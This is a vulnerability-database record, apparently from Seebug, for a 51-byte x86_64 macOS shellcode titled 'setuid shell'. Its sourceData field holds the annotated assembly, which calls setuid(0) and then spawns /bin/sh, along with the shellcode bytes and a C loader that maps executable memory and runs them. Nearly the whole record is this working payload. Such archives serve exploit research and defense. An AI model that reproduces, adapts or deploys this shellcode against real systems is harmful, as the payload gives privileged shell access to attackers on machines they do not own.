Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-70285", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "OSX/Intel - setuid shell x86_64 - 51 bytes", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70285", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n /*\r\n * Title: OSX/Intel - setuid shell x86_64 - 51 bytes\r\n * Date: 2010-11-25\r\n * Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0\r\n * Author: Dustin Schultz - twitter: @thexploit\r\n *\r\n * http://thexploit.com\r\n *\r\n * BITS 64\r\n *\r\n * section .text\r\n * global start\r\n *\r\n * start:\r\n * a:\r\n * mov r8b, 0x02 ; Unix class system calls = 2\r\n * shl r8, 24 ; shift left 24 to the upper order bits\r\n * or r8, 0x17 ; setuid = 23, or with class = 0x2000017\r\n * xor edi, edi ; zero out edi\r\n * mov rax, r8 ; syscall number in rax\r\n * syscall ; invoke kernel\r\n * jmp short c ; jump to c\r\n * b:\r\n * pop rdi ; pop ret addr which = addr of /bin/sh\r\n * add r8, 0x24 ; execve = 59, 0x24+r8=0x200003b\r\n * mov rax, r8 ; syscall number in rax\r\n * xor rdx, rdx ; zero out rdx\r\n * push rdx ; null terminate rdi, pushed backwards\r\n * push rdi ; push rdi = pointer to /bin/sh\r\n * mov rsi, rsp ; pointer to null terminated /bin/sh string\r\n * syscall ; invoke the kernel\r\n * c:\r\n * call b ; call b, push ret of /bin/sh\r\n * db '/bin//sh' ; /bin/sh string\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\nint (*sc)();\r\n\r\nchar shellcode[] =\r\n"\\x41\\xb0\\x02\\x49\\xc1\\xe0\\x18\\x49\\x83\\xc8\\x17\\x31\\xff\\x4c\\x89\\xc0"\r\n"\\x0f\\x05\\xeb\\x12\\x5f\\x49\\x83\\xc0\\x24\\x4c\\x89\\xc0\\x48\\x31\\xd2\\x52"\r\n"\\x57\\x48\\x89\\xe6\\x0f\\x05\\xe8\\xe9\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f"\r\n"\\x2f\\x73\\x68";\r\n\r\nint main(int argc, char **argv) {\r\n\r\n\tvoid *ptr = mmap(0, 0x33, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON\r\n\t\t\t| MAP_PRIVATE, -1, 0);\r\n\r\n\tif (ptr == MAP_FAILED) {\r\n\t\tperror("mmap");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tmemcpy(ptr, shellcode, sizeof(shellcode));\r\n\tsc = ptr;\r\n\r\n\tsc();\r\n\r\n\treturn 0;\r\n}\r\n\r\n\n ", "id": "SSV:70285", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:39:40", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645381278}}